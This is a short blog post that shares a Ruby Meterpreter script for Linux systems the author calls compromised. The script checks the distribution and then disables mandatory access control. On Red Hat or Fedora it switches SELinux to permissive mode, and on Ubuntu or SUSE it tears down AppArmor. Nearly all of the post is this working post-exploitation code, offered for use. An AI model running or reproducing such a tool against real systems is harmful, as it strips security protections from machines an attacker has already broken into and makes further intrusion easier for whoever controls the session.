Quick Meterpreter script

So beings I wanted to get back into ruby and also like metasploit, I decided to write a quick meterpreter script to assist in shutting down the mandatory access control running on your flavor of linux. It’s real quick and dirty to get the job done.

#$Id: mac_off.rb 2011-06-19 3vi1john$
#Meterpreter script for linux the switches selinux to permissive mode or turns off apparmor.
#$Revision: 1$
#Provided by John Babio at <3vi1john [at] gmx.com>



@@exec_opts = Rex::Parser::Arguments.new(
        "-h" => [ false, "Help menu." ]
)
def usage
        print_line("This script quickly sets selinux to permissive mode or turns off apparmor depending on the compromised linux distro")
        print_line("USAGE: Just run the script.")
        print_line(@@exec_opts.usage)
        raise Rex::Script::Completed
end

@@exec_opts.parse(args) { |opt, idx, val|
        case opt
        when "-h"
                usage
        end
}

kernel = client.sys.config.sysinfo['OS']
print_status("Checking Linux version...")
if kernel =~/el3|el4|el5|el6|fc1|fc2|fc3|fc4|fc5|fc6|fc7|fc8|fc9|fc10|fc11|fc12|fc13|fc14|fc15/
        print_status("It Looks like a version of Redhat or Fedora.")
	print_status("Attempting to move SELinux from enforcing to permissive...")
        client.sys.process.execute("//usr//sbin//setenforce", "permissive")
	print_status("Successfully moved SELinux to permissive mode.")
elsif kernel =~/Ubuntu|ubuntu|Suse|suse|sles|Sles/
        print_status("It Looks like Ubuntu or Suse.")
	print_status("Attempting to Kill Apparmor...")
        client.sys.process.execute("//etc//init.d//apparmor", "teardown")
	print_status("Successfully turned off apparmor.")
else
        print_status("The linux version is not found in the list. No MAC to kill.")
end
Advertisements

Tags: , , , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: